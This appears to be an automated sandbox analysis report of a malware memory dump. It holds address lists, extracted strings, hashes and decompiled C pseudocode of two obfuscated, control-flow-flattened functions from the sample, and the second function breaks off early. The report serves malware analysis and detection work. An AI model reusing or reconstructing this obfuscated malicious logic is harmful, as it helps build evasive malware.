0x0023ae6c
0x0023af1a
0x0023af21
0x00000000
0x0023ae72
0x0023ae72
0x0023ae78
0x0023aef6
0x0023aefd
0x00000000
0x0023ae7a
0x0023ae7a
0x0023ae80
0x0023b02b
0x0023b02c
0x0023b033
0x0023b03a
0x00000000
0x0023ae86
0x0023ae86
0x0023ae8c
0x00000000
0x0023ae92
0x0023aeb5
0x0023aebd
0x0023aec2
0x0023aec7
0x0023aecf
0x00000000
0x0023aecf
0x0023ae8c
0x0023ae80
0x0023ae78
0x0023ae6c
0x0023ae60
0x0023ae54
0x00000000
0x0023ae48
0x0023aaa4
0x0023aaa1

Strings

w, xrefs: 0023A44C
./, xrefs: 0023A492
NS5, xrefs: 0023A750
m9, xrefs: 0023A61D
}=, xrefs: 0023A762
p=4E, xrefs: 0023A8E1
cA, xrefs: 0023A15A
%, xrefs: 0023A3BD
q, xrefs: 0023A4DA
M#, xrefs: 0023A0EC
25, xrefs: 0023A33C
=;, xrefs: 0023A102
E, xrefs: 0023A991
jg, xrefs: 0023A165
m, xrefs: 0023A10D
C/, xrefs: 0023A76A
j@}9, xrefs: 0023AE86
5a, xrefs: 0023A5FD
<8, xrefs: 0023A134
{, xrefs: 0023A893
KZ, xrefs: 0023A5DC
Q, xrefs: 0023A7C1
#}, xrefs: 0023A507
nXj, xrefs: 0023A014
dW, xrefs: 0023AA80
Q[, xrefs: 0023A188
"m, xrefs: 0023A860
Z9, xrefs: 0023A427
tu, xrefs: 0023A706
S', xrefs: 0023A72B
Lf, xrefs: 0023A625

Memory Dump Source

Source File: 00000007.00000002.2111086691.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true

Associated: 00000007.00000002.2111061429.0000000000230000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2111135016.000000000024C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID: "m$#}$%$./$25$5a$<8$=;$C/$KZ$Lf$M#$Q[$Q$S'$Z9$cA$dW$j@}9$jg$m$m9$nXj$p=4E$tu${$}=$E$NS5$q$w
API String ID: 0-3061497230
Opcode ID: 35b7cc4ae7f77b57a18cac2bc78a2fbaecb881c1dae8adcf1a590354b22caa4a
Instruction ID: 524ec21124ab27be4ae54ebcecb4891c3d8bfbad67950b5eaa8dd6e60b4fff16
Opcode Fuzzy Hash: 35b7cc4ae7f77b57a18cac2bc78a2fbaecb881c1dae8adcf1a590354b22caa4a
Instruction Fuzzy Hash: 978224B151C3818BE378CF25C549B9BBBE2BBC4314F10891DE2DA86260DBB59959CF43

Uniqueness

Uniqueness Score: -1.00%

Function 0023C769, Relevance: 24.4, Strings: 19, Instructions: 630
COMMONCrypto

Download Yara Rule

C-Code - Quality: 95%

			E0023C769(intOrPtr __ecx, intOrPtr* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, signed int _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr _a40) {
				char _v4;
				char _v8;
				intOrPtr _v12;
				char _v16;
				intOrPtr _v20;
				char _v24;
				char _v28;
				intOrPtr _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				signed int _v212;
				signed int _v216;
				signed int _v220;
				signed int _v224;
				signed int _v228;
				signed int _v232;
				signed int _v236;
				signed int _v240;
				signed int _v244;
				signed int _v248;
				signed int _v252;
				signed int _v256;
				signed int _v260;
				signed int _v264;
				signed int _v268;
				signed int _v272;
				signed int _v276;
				signed int _v280;
				signed int _v284;
				signed int _v288;
				unsigned int _v292;
				signed int _v296;
				signed int _v300;
				signed int _v304;
				signed int _v308;
				signed int _v312;
				intOrPtr _v316;
				char _v320;
				intOrPtr _t666;
				intOrPtr _t667;
				intOrPtr _t672;
				void* _t679;
				intOrPtr _t680;
				intOrPtr _t687;
				intOrPtr _t689;
				intOrPtr _t693;
				intOrPtr* _t694;
				signed int _t706;
				intOrPtr _t707;
				void* _t712;
				intOrPtr _t718;
				void* _t758;
				signed int _t773;
				signed int _t774;
				signed int _t775;
				signed int _t776;
				signed int _t777;
				signed int _t778;
				signed int _t779;
				signed int _t780;
				signed int _t781;
				signed int _t782;
				signed int _t783;
				signed int _t784;
				intOrPtr _t785;
				signed int _t786;
				intOrPtr _t788;
				char _t793;
				void* _t795;
				void* _t797;

				_t694 = __edx;
				_push(_a40);
				_push(_a36);
				_v20 = __ecx;
				_push(_a32);
				_push(_a28);
				_push(_a24);
				_push(_a20 & 0x0000ffff);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0023602B(_a20 & 0x0000ffff);
				_v12 = 0x78501c;
				_v24 = 0;
				_v8 = 0;
				_t793 = 0;
				_v4 = 0;
				_t795 =  &_v320 + 0x30;
				_v232 = 0x7906;
				_t786 = 0xcd25e5e;
				_v232 = _v232 << 6;
				_v232 = _v232 >> 0xa;
				_v232 = _v232 ^ 0x00000790;
				_v156 = 0xf83b;
				_v156 = _v156 >> 0xb;
				_v156 = _v156 ^ 0x0000000c;
				_v52 = 0x2ceb;
				_v52 = _v52 | 0xa5610ac4;
				_v52 = _v52 ^ 0xa5612e27;
				_v208 = 0x96db;
				_v208 = _v208 + 0xffffce2c;
				_v208 = _v208 | 0x71346f29;
				_v208 = _v208 ^ 0x7134ef2f;
				_v116 = 0x28a4;
				_v116 = _v116 + 0xffff342e;
				_v116 = _v116 ^ 0xffff1cd2;
				_v124 = 0xa3bc;
				_v124 = _v124 + 0xffffb3e2;
				_v124 = _v124 ^ 0x0040579e;
				_v132 = 0x4a92;
				_v132 = _v132 << 0xb;
				_v132 = _v132 ^ 0x02509000;
				_v140 = 0xcc93;
				_v140 = _v140 >> 0xd;
				_v140 = _v140 ^ 0x04000006;
				_v148 = 0xadf6;
				_v148 = _v148 >> 5;
				_v148 = _v148 ^ 0x0008056f;
				_v216 = 0xcf16;
				_v216 = _v216 ^ 0x2caffd24;
				_v216 = _v216 >> 8;
				_v216 = _v216 ^ 0x002cad32;
				_v296 = 0xe55e;
				_v296 = _v296 << 0x10;
				_v296 = _v296 + 0xffff79ea;
				_v296 = _v296 << 5;
				_v296 = _v296 ^ 0xabaf3c40;
				_v152 = 0xf9a;
				_v16 = 0;
				_v320 = 0;
				_v152 = _v152 * 0x3f;
				_v152 = _v152 ^ 0x8003d6e6;
				_v120 = 0x15;
				_v120 = _v120 << 2;
				_v120 = _v120 ^ 0x00000054;
				_v144 = 0x2eae;
				_v144 = _v144 + 0x3c19;
				_v144 = _v144 ^ 0x00006ac4;
				_v56 = 0xab01;
				_t773 = 0x5e;
				_v56 = _v56 / _t773;
				_v56 = _v56 ^ 0x00004cb8;
				_v104 = 0x2a8e;
				_t774 = 0x2c;
				_v104 = _v104 / _t774;
				_v104 = _v104 ^ 0x000033ed;
				_v292 = 0xd22b;
				_v292 = _v292 | 0xd3babaa8;
				_t775 = 0x50;
				_v292 = _v292 * 0x6c;
				_v292 = _v292 >> 7;
				_v292 = _v292 ^ 0x00a58d92;
				_v96 = 0x39fa;
				_v96 = _v96 / _t775;
				_v96 = _v96 ^ 0x00002d01;
				_v240 = 0xf5d4;
				_v240 = _v240 ^ 0x5b9fa071;
				_v240 = _v240 >> 3;
				_v240 = _v240 ^ 0x0b73efef;
				_v248 = 0x1311;
				_t776 = 0x42;
				_v248 = _v248 / _t776;
				_v248 = _v248 + 0x5e6d;
				_v248 = _v248 ^ 0x00004acc;
				_v88 = 0x907;
				_t777 = 0x6e;
				_v88 = _v88 * 0x48;
				_v88 = _v88 ^ 0x0002ff0c;
				_v36 = 0x8ec2;
				_v36 = _v36 / _t777;
				_v36 = _v36 ^ 0x00005772;
				_v260 = 0x4792;
				_v260 = _v260 << 0xd;
				_v260 = _v260 >> 0xb;
				_v260 = _v260 >> 4;
				_v260 = _v260 ^ 0x00006a86;
				_v224 = 0x4f89;
				_v224 = _v224 + 0xffff3059;
				_t778 = 0x21;
				_v224 = _v224 * 0x6e;
				_v224 = _v224 ^ 0xffc8e4d3;
				_v48 = 0x8858;
				_v48 = _v48 + 0x804a;
				_v48 = _v48 ^ 0x00017e21;
				_v312 = 0xd58c;
				_v312 = _v312 | 0x45747a0f;
				_v312 = _v312 >> 0xa;
				_v312 = _v312 / _t778;
				_v312 = _v312 ^ 0x00008646;
				_v300 = 0xadcd;
				_v300 = _v300 >> 8;
				_v300 = _v300 << 9;
				_v300 = _v300 >> 1;
				_v300 = _v300 ^ 0x00008fc4;
				_v268 = 0xd742;
				_t779 = 0x30;
				_v268 = _v268 / _t779;
				_v268 = _v268 + 0x61d9;
				_v268 = _v268 >> 4;
				_v268 = _v268 ^ 0x00000191;
				_v204 = 0x8d76;
				_v204 = _v204 | 0x1111a955;
				_v204 = _v204 << 5;
				_v204 = _v204 ^ 0x2235a282;
				_v64 = 0x8939;
				_v64 = _v64 + 0xffff3fc4;
				_v64 = _v64 ^ 0xffff80c7;
				_v276 = 0x72;
				_v276 = _v276 * 0x7d;
				_v276 = _v276 + 0xffff8366;
				_v276 = _v276 >> 9;
				_v276 = _v276 ^ 0x007facee;
				_v44 = 0xf34a;
				_v44 = _v44 + 0xffffbf38;
				_v44 = _v44 ^ 0x00008263;
				_v112 = 0x1dc0;
				_v112 = _v112 ^ 0x2c6551d7;
				_v112 = _v112 ^ 0x2c653ad3;
				_v228 = 0xc596;
				_v228 = _v228 ^ 0x9ca21630;
				_v228 = _v228 ^ 0x8f0fd5bf;
				_v228 = _v228 ^ 0x13ad7fff;
				_v196 = 0x8cfa;
				_v196 = _v196 >> 1;
				_v196 = _v196 ^ 0xfb4b109c;
				_v196 = _v196 ^ 0xfb4b1bca;
				_v236 = 0x2fd6;
				_v236 = _v236 << 7;
				_v236 = _v236 << 2;
				_v236 = _v236 ^ 0x005fedce;
				_v180 = 0x51a5;
				_v180 = _v180 ^ 0x4af0041f;
				_v180 = _v180 + 0xfffff3cf;
				_v180 = _v180 ^ 0x4af05e30;
				_v244 = 0x8950;
				_v244 = _v244 << 0xc;
				_v244 = _v244 | 0xbaabdb8a;
				_v244 = _v244 ^ 0xbabf869d;
				_v40 = 0xc836;
				_v40 = _v40 + 0xffff3474;
				_v40 = _v40 ^ 0xffff8af1;
				_v176 = 0x9727;
				_v176 = _v176 + 0xffffb8fc;
				_v176 = _v176 >> 3;
				_v176 = _v176 ^ 0x00001e80;
				_v304 = 0x64c7;
				_v304 = _v304 + 0x56f7;
				_v304 = _v304 ^ 0x2de137fe;
				_v304 = _v304 + 0xaf99;
				_v304 = _v304 ^ 0x2de22ef8;
				_v308 = 0x2e06;
				_v308 = _v308 | 0x78777a1f;
				_v308 = _v308 * 0x79;
				_v308 = _v308 >> 3;
				_v308 = _v308 ^ 0x1e0f1828;
				_v92 = 0xc9a2;
				_v92 = _v92 | 0xf3c29ea2;
				_v92 = _v92 ^ 0xf3c28d84;
				_v100 = 0xecbf;
				_v100 = _v100 + 0xffff0faf;
				_v100 = _v100 ^ 0xffffc0a5;
				_v192 = 0x95e0;
				_v192 = _v192 << 8;
				_v192 = _v192 << 9;
				_v192 = _v192 ^ 0x2bc00f3b;
				_v200 = 0x7c40;
				_t780 = 0x3a;
				_v200 = _v200 / _t780;
				_v200 = _v200 << 8;
				_v200 = _v200 ^ 0x000244df;
				_v272 = 0x7605;
				_v272 = _v272 << 5;
				_v272 = _v272 + 0xffffdeaf;
				_v272 = _v272 >> 0xb;
				_v272 = _v272 ^ 0x00001482;
				_v108 = 0x1c78;
				_v108 = _v108 + 0x3c33;
				_v108 = _v108 ^ 0x00006c40;
				_v280 = 0xd61a;
				_v280 = _v280 ^ 0xfb8fe6a7;
				_v280 = _v280 + 0x5fc;
				_v280 = _v280 | 0xbad3e440;
				_v280 = _v280 ^ 0xfbdf8156;
				_v288 = 0x89a2;
				_v288 = _v288 + 0xffff4641;
				_v288 = _v288 >> 0xc;
				_v288 = _v288 >> 0xd;
				_v288 = _v288 ^ 0x000071e8;
				_v252 = 0xe21c;
				_v252 = _v252 ^ 0x457ecc8f;
				_t781 = 0x67;
				_v252 = _v252 * 0x59;
				_v252 = _v252 ^ 0x28de7ded;
				_v84 = 0xe1;
				_v84 = _v84 >> 3;
				_v84 = _v84 ^ 0x00001e3a;
				_v184 = 0xbeeb;
				_v184 = _v184 * 0x12;
				_v184 = _v184 + 0x8ae1;
				_v184 = _v184 ^ 0x000de1ad;
				_v68 = 0xfd10;
				_v68 = _v68 >> 0xf;
				_v68 = _v68 ^ 0x000036f7;
				_v76 = 0x1f03;
				_v76 = _v76 * 0x49;
				_v76 = _v76 ^ 0x000897f9;
				_v264 = 0xf0d9;
				_v264 = _v264 * 0x66;
				_v264 = _v264 + 0xffffb5cf;
				_v264 = _v264 + 0xea22;
				_v264 = _v264 ^ 0x0060dcb6;
				_v168 = 0xdfa9;
				_v168 = _v168 ^ 0x7c3d7298;
				_v168 = _v168 ^ 0xd2777362;
				_v168 = _v168 ^ 0xae4ad343;
				_v72 = 0x8534;
				_v72 = _v72 ^ 0x085524ca;
				_v72 = _v72 ^ 0x085595c2;
				_v136 = 0x90f3;
				_v136 = _v136 + 0xcfad;
				_v136 = _v136 ^ 0x00017ab2;
				_v220 = 0x7eee;
				_v220 = _v220 >> 3;
				_v220 = _v220 + 0xffffea23;
				_v220 = _v220 ^ 0xffffcf89;
				_v164 = 0x31cc;
				_v164 = _v164 | 0x82d13576;
				_v164 = _v164 >> 3;
				_v164 = _v164 ^ 0x105a14dc;
				_v284 = 0xab9f;
				_v284 = _v284 / _t781;
				_v284 = _v284 + 0xffff982b;
				_v284 = _v284 + 0xcf45;
				_v284 = _v284 ^ 0x000072b9;
				_v80 = 0x4458;
				_v80 = _v80 + 0xfa7e;
				_v80 = _v80 ^ 0x000168e1;
				_v128 = 0x89b9;
				_v128 = _v128 + 0xe32e;
				_v128 = _v128 ^ 0x00010bac;
				_v172 = 0xe617;
				_v172 = _v172 << 4;
				_v172 = _v172 + 0xb499;
				_v172 = _v172 ^ 0x000f5cd6;
				_v212 = 0x2b1d;
				_v212 = _v212 << 0x10;
				_t782 = 0x21;
				_v212 = _v212 * 0x7f;
				_v212 = _v212 ^ 0x63636a51;
				_v188 = 0x87b6;
				_v188 = _v188 | 0xa87ad713;
				_v188 = _v188 << 3;
				_v188 = _v188 ^ 0x43d6c05c;
				_v60 = 0x1ec0;
				_v60 = _v60 / _t782;
				_v60 = _v60 ^ 0x000042c8;
				_v256 = 0x1798;
				_v256 = _v256 ^ 0x8091dd24;
				_v256 = _v256 | 0xdc47dedf;
				_t783 = 0x19;
				_v256 = _v256 * 0x5d;
				_v256 = _v256 ^ 0x3a6c6c2e;
				_v160 = 0x6f3f;
				_v160 = _v160 / _t783;
				_t784 = 0x73;
				_t785 = _v20;
				_v160 = _v160 / _t784;
				_v160 = _v160 ^ 0x00005ad1;
				while(1) {
					L1:
					_t758 = 0x1fbed331;
					while(1) {
						_t797 = _t786 - _t758;
						if(_t797 <= 0) {
						}
						L3:
						if(_t797 == 0) {
							__eflags = E00235B79(_t785, _v20);
							_t786 = 0x1b724d6a;
							_t679 = 1;
							_t793 =  !=  ? _t679 : _t793;
							L13:
							_t666 = _v316;
							L14:
							_t707 = _v320;
							goto L1;
						}
						if(_t786 == 0xa0d70be) {
							__eflags = _t694;
							if(_t694 == 0) {
								_t718 = 0;
								__eflags = 0;
							} else {
								_t718 =  *_t694;
							}
							__eflags = _t694;
							if(_t694 == 0) {
								_t680 = 0;
								__eflags = 0;
							} else {
								_t680 =  *((intOrPtr*)(_t694 + 4));
							}
							E00248422(_v72, _v136, _v220, _a28, _t785, _t680, _t718, _v164, _t718);
							_t795 = _t795 + 0x1c;
							asm("sbb esi, esi");
							_t786 = (_t786 & 0x1873afa8) + 0x1b724d6a;
							goto L13;
						}
						if(_t786 == 0xcd25e5e) {
							_t786 = 0x25fbc0d1;
							while(1) {
								_t797 = _t786 - _t758;
								if(_t797 <= 0) {
								}
								goto L25;
							}
							goto L3;
						}
						if(_t786 == 0xdfc12f5) {
							_t666 = E00247955(_a20, _v228, _v196, _t707, _v236, _v180, _t707, _v244, _v40, _v144, _a12, _t707, _v32, _t707, _v176);
							_t795 = _t795 + 0x34;
							_v316 = _t666;
							__eflags = _t666;
							_t786 =  !=  ? 0x20246154 : 0x1e7ff602;
							goto L14;
						}
						if(_t786 == 0x1b724d6a) {
							E00237925(_v284, _t785, _v80, _v128);
							_t786 = 0x2cd2473d;
							L12:
							goto L13;
						}
						if(_t786 != 0x1e7ff602) {
							L45:
							__eflags = _t786 - 0x258a7eda;
							if(_t786 == 0x258a7eda) {
								L10:
								return _t793;
							}
							_t666 = _v316;
							continue;
						}
						E00237925(_v60, _v32, _v256, _v160);
						goto L10;
						L25:
						__eflags = _t786 - 0x20246154;
						if(_t786 == 0x20246154) {
							__eflags = _t694;
							if(__eflags == 0) {
								_t787 = _v16;
							} else {
								_push(_v308);
								_t667 = E0024889D(0x24c850, _v304, __eflags);
								_t787 = _t667;
								_v16 = _t667;
							}
							_t785 = E00231BD7(_v152 | _v296 | _v216 | _v148 | _v140 | _v132 | _v124 | _v116 | _v208, _v92, _v100, _v192, _v200, _v152 | _v296 | _v216 | _v148 | _v140 | _v132 | _v124 | _v116 | _v208, _v316, _v152 | _v296 | _v216 | _v148 | _v140 | _v132 | _v124 | _v116 | _v208, _t705, _v272, _t787, _v108, _a24, _t705, _v280, _v288);
							_t706 = _v252;
							E00242025(_t706, _t787, _v84, _v184);
							_t795 = _t795 + 0x40;
							__eflags = _t785;
							if(_t785 == 0) {
								_t786 = 0x2cd2473d;
								L44:
								_t707 = _v320;
								_t758 = 0x1fbed331;
								goto L45;
							}
							_push(_t706);
							_v28 = 1;
							_t693 = E00246AFF(_v68, _v76, _v264,  &_v28, _v168, _t785);
							_t795 = _t795 + 0x18;
							_v28 = _t693;
							_t786 = 0xa0d70be;
							goto L13;
						}
						__eflags = _t786 - 0x25fbc0d1;
						if(_t786 == 0x25fbc0d1) {
							_push(0x200);
							_v24 = 0x200;
							_t788 = E00238736(0x200);
							_t712 = 0x200;
							__eflags = _t788;
							if(_t788 != 0) {
								_t687 = E0023F74E(_t712, _t788,  &_v24, _v96, _v240, _v248);
								_t795 = _t795 + 0x10;
								__eflags = _t687;
								if(_t687 == 0) {
									_t689 = E00240F0C(_v88, _t788, _t712, _v36, _v232, _t712, _v260);
									_t795 = _t795 + 0x14;
									_v320 = _t689;
								}
								E0023F536(_v224, _v48, _v312, _t788);
							}
							_t786 = 0x276816a4;
							goto L13;
						}
						__eflags = _t786 - 0x276816a4;
						if(_t786 == 0x276816a4) {
							_push(_t707);
							_t672 = E00235A52(_t707, _t707, _v300, _v268, _v204, _v64, _v120);
							__eflags = _t672;
							_v32 = _t672;
							_t786 =  !=  ? 0xdfc12f5 : 0x258a7eda;
							E0023F536(_v276, _v44, _v112, _v320);
							_t795 = _t795 + 0x24;
							goto L44;
						}
						__eflags = _t786 - 0x2cd2473d;
						if(_t786 == 0x2cd2473d) {
							E00237925(_v172, _t666, _v212, _v188);
							_t786 = 0x1e7ff602;
							goto L12;
						}
						__eflags = _t786 - 0x33e5fd12;
						if(__eflags != 0) {
							goto L45;
						}
						__eflags = E0024687F(_t785, _v156, __eflags) - _v52;
						_t758 = 0x1fbed331;
						_t666 = _v316;
						_t707 = _v320;
						_t786 =  ==  ? 0x1fbed331 : 0x1b724d6a;
					}
				}
			}

0x0023c777
0x0023c77c
0x0023c786
0x0023c78d
0x0023c794
0x0023c79b
0x0023c7a2
0x0023c7a9
0x0023c7aa
0x0023c7b1
0x0023c7b8
0x0023c7bf
0x0023c7c6
0x0023c7c7
0x0023c7c8
0x0023c7cd
0x0023c7da
0x0023c7e3
0x0023c7ea
0x0023c7ec
0x0023c7f3
0x0023c7f6
0x0023c7fe
0x0023c803
0x0023c808
0x0023c80d
0x0023c815
0x0023c820
0x0023c828
0x0023c830
0x0023c83b
0x0023c846
0x0023c851
0x0023c85c
0x0023c867
0x0023c872
0x0023c87d
0x0023c888
0x0023c893
0x0023c89e
0x0023c8a9
0x0023c8b4
0x0023c8bf
0x0023c8ca
0x0023c8d2
0x0023c8dd
0x0023c8e8
0x0023c8f0
0x0023c8fb
0x0023c906
0x0023c90e
0x0023c919
0x0023c921
0x0023c929
0x0023c92e
0x0023c936
0x0023c93e
0x0023c943
0x0023c94b
0x0023c950
0x0023c958
0x0023c963
0x0023c972
0x0023c976
0x0023c97d
0x0023c988
0x0023c993
0x0023c99b
0x0023c9a3
0x0023c9ae
0x0023c9b9
0x0023c9c4
0x0023c9da
0x0023c9df
0x0023c9e8
0x0023c9f3
0x0023ca05
0x0023ca0a
0x0023ca13
0x0023ca1e
0x0023ca26
0x0023ca33
0x0023ca36
0x0023ca3a
0x0023ca3f
0x0023ca47
0x0023ca5d
0x0023ca64
0x0023ca6f
0x0023ca77
0x0023ca7f
0x0023ca84
0x0023ca8c
0x0023ca98
0x0023ca9d
0x0023caa3
0x0023caab
0x0023cab3
0x0023cac6
0x0023cac9
0x0023cad0
0x0023cadb
0x0023caf1
0x0023caf8
0x0023cb03
0x0023cb0b
0x0023cb10
0x0023cb15
0x0023cb1a
0x0023cb22
0x0023cb2a
0x0023cb37
0x0023cb38
0x0023cb3c
0x0023cb44
0x0023cb4f
0x0023cb5a
0x0023cb65
0x0023cb6d
0x0023cb75
0x0023cb80
0x0023cb84
0x0023cb8c
0x0023cb94
0x0023cb99
0x0023cb9e
0x0023cba2
0x0023cbac
0x0023cbba
0x0023cbbd
0x0023cbc1
0x0023cbc9
0x0023cbce
0x0023cbd6
0x0023cbe1
0x0023cbec
0x0023cbf4
0x0023cbff
0x0023cc0a
0x0023cc15
0x0023cc20
0x0023cc2d
0x0023cc31
0x0023cc39
0x0023cc3e
0x0023cc46
0x0023cc51
0x0023cc5c
0x0023cc67
0x0023cc72
0x0023cc7d
0x0023cc88
0x0023cc90
0x0023cc98
0x0023cca0
0x0023cca8
0x0023ccb3
0x0023ccba
0x0023ccc5
0x0023ccd0
0x0023ccd8
0x0023ccdd
0x0023cce2
0x0023ccea
0x0023ccf5
0x0023cd00
0x0023cd0b
0x0023cd16
0x0023cd1e
0x0023cd23
0x0023cd2b
0x0023cd33
0x0023cd3e
0x0023cd49
0x0023cd54
0x0023cd5f
0x0023cd6a
0x0023cd72
0x0023cd7d
0x0023cd85
0x0023cd8d
0x0023cd95
0x0023cd9d
0x0023cda5
0x0023cdad
0x0023cdba
0x0023cdbe
0x0023cdc3
0x0023cdcb
0x0023cdd6
0x0023cde1
0x0023cdec
0x0023cdf7
0x0023ce02
0x0023ce0d
0x0023ce18
0x0023ce20
0x0023ce28
0x0023ce35
0x0023ce49
0x0023ce4e
0x0023ce57
0x0023ce5f
0x0023ce6a
0x0023ce72
0x0023ce77
0x0023ce7f
0x0023ce84
0x0023ce8c
0x0023ce97
0x0023cea2
0x0023cead
0x0023ceb5
0x0023cebd
0x0023cec5
0x0023cecd
0x0023ced5
0x0023cedd
0x0023cee5
0x0023ceea
0x0023ceef
0x0023cef7
0x0023ceff
0x0023cf0c
0x0023cf0d
0x0023cf11
0x0023cf19
0x0023cf24
0x0023cf2c
0x0023cf37
0x0023cf4a
0x0023cf51
0x0023cf5c
0x0023cf67
0x0023cf72
0x0023cf7a
0x0023cf85
0x0023cf98
0x0023cf9f
0x0023cfaa
0x0023cfb7
0x0023cfbb
0x0023cfc3
0x0023cfcb
0x0023cfd3
0x0023cfde
0x0023cfe9
0x0023cff4
0x0023cfff
0x0023d00a
0x0023d015
0x0023d020
0x0023d02b
0x0023d036
0x0023d041
0x0023d049
0x0023d04e
0x0023d056
0x0023d05e
0x0023d069
0x0023d074
0x0023d07c
0x0023d087
0x0023d095
0x0023d099
0x0023d0a1
0x0023d0a9
0x0023d0b1
0x0023d0bc
0x0023d0c7
0x0023d0d2
0x0023d0df
0x0023d0ea
0x0023d0f5
0x0023d100
0x0023d108
0x0023d113
0x0023d11e
0x0023d126
0x0023d132
0x0023d135
0x0023d13c
0x0023d147
0x0023d152
0x0023d15d
0x0023d165
0x0023d170
0x0023d186
0x0023d18d
0x0023d198
0x0023d1a0
0x0023d1a8
0x0023d1b5
0x0023d1b8
0x0023d1bc
0x0023d1c4
0x0023d1da
0x0023d1e8
0x0023d1eb
0x0023d1f2
0x0023d1f9
0x0023d208
0x0023d208
0x0023d208
0x0023d20d
0x0023d20d
0x0023d20f
0x0023d20f
0x0023d215
0x0023d215
0x0023d386
0x0023d388
0x0023d38f
0x0023d390
0x0023d29d
0x0023d29d
0x0023d2a1
0x0023d2a1
0x00000000
0x0023d2a1
0x0023d221
0x0023d31f
0x0023d321
0x0023d327
0x0023d327
0x0023d323
0x0023d323
0x0023d323
0x0023d329
0x0023d32b
0x0023d332
0x0023d332
0x0023d32d
0x0023d32d
0x0023d32d
0x0023d35b
0x0023d360
0x0023d365
0x0023d36d
0x00000000
0x0023d36d
0x0023d22d
0x0023d315
0x0023d20d
0x0023d20d
0x0023d20f
0x0023d20f
0x00000000
0x0023d20f
0x00000000
0x0023d20d
0x0023d23a
0x0023d2f8
0x0023d2fd
0x0023d300
0x0023d304
0x0023d310
0x00000000
0x0023d310
0x0023d242
0x0023d291
0x0023d296
0x0023d29b
0x00000000
0x0023d29c
0x0023d24a
0x0023d639
0x0023d639
0x0023d63f
0x0023d272
0x0023d27c
0x0023d27c
0x0023d645
0x00000000
0x0023d645
0x0023d269
0x00000000
0x0023d398
0x0023d398
0x0023d39e
0x0023d51a
0x0023d51c
0x0023d53c
0x0023d51e
0x0023d51e
0x0023d52b
0x0023d530
0x0023d533
0x0023d533
0x0023d5c9
0x0023d5d2
0x0023d5d9
0x0023d5de
0x0023d5e1
0x0023d5e3
0x0023d62b
0x0023d630
0x0023d630
0x0023d634
0x00000000
0x0023d634
0x0023d5e5
0x0023d5f1
0x0023d612
0x0023d617
0x0023d61a
0x0023d621
0x00000000
0x0023d621
0x0023d3a4
0x0023d3aa
0x0023d498
0x0023d49a
0x0023d4a6
0x0023d4a9
0x0023d4aa
0x0023d4ac
0x0023d4c7
0x0023d4cc
0x0023d4cf
0x0023d4d1
0x0023d4ed
0x0023d4f2
0x0023d4f5
0x0023d4f5
0x0023d509
0x0023d50f
0x0023d510
0x00000000
0x0023d510
0x0023d3b0
0x0023d3b6
0x0023d423
0x0023d442
0x0023d447
0x0023d449
0x0023d45a
0x0023d474
0x0023d479
0x00000000
0x0023d479
0x0023d3b8
0x0023d3be
0x0023d414
0x0023d419
0x00000000
0x0023d419
0x0023d3c0
0x0023d3c6
0x00000000
0x00000000
0x0023d3e6
0x0023d3e8
0x0023d3ed
0x0023d3f1
0x0023d3f5
0x0023d3f5
0x0023d20d

Strings

.ll:, xrefs: 0023D1BC
rW, xrefs: 0023CAF8
^, xrefs: 0023C936
., xrefs: 0023D0DF
", xrefs: 0023CFC3
@|, xrefs: 0023CE35
r, xrefs: 0023CC20
Qjcc, xrefs: 0023D13C
Ta$ , xrefs: 0023D30B
@l, xrefs: 0023CEA2
3, xrefs: 0023CA13
q, xrefs: 0023CEEF
T, xrefs: 0023C99B
Ta$ , xrefs: 0023D398
m^, xrefs: 0023CAA3
~, xrefs: 0023D041
?o, xrefs: 0023D1C4
XD, xrefs: 0023D0B1
,, xrefs: 0023C830

Memory Dump Source

Source File: 00000007.00000002.2111086691.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true

Associated: 00000007.00000002.2111061429.0000000000230000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2111135016.000000000024C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID: "$.ll:$.$?o$@l$@|$Qjcc$T$Ta$ $Ta$ $XD$^$m^$r$rW$,$3$q$~
API String ID: 0-3595463394
Opcode ID: 0eafe49303bd8d60036b7d9460279cacbae51b3b53c16940995e943add2d1a7e
Instruction ID: 6af76bccb27828694191b778dbff72edd729dd73bd216f88898328532aacbe5a
Opcode Fuzzy Hash: 0eafe49303bd8d60036b7d9460279cacbae51b3b53c16940995e943add2d1a7e
Instruction Fuzzy Hash: 62720FB15183818BE3B8CF25D54AB9BBBE1BBC4304F10891DE5D9962A0DBB58859CF43

Uniqueness

Uniqueness Score: -1.00%

Function 0023D7EB, Relevance: 21.6, Strings: 17, Instructions: 347
COMMONCrypto

Download Yara Rule

C-Code - Quality: 98%

			E0023D7EB() {
				char _v520;
				char _v1040;
				signed int _v1044;
				signed int _v1048;
				signed int _v1052;
				signed int _v1056;
				signed int _v1060;
				signed int _v1064;
				signed int _v1068;
				signed int _v1072;
				signed int _v1076;
				signed int _v1080;
				signed int _v1084;
				signed int _v1088;
				signed int _v1092;
				signed int _v1096;
				signed int _v1100;
				signed int _v1104;
				signed int _v1108;
				signed int _v1112;
				signed int _v1116;
				signed int _v1120;
				signed int _v1124;
				signed int _v1128;
				signed int _v1132;
				signed int _v1136;
				signed int _v1140;
				signed int _v1144;
				signed int _v1148;
				signed int _v1152;
				signed int _v1156;
				signed int _v1160;
				signed int _v1164;
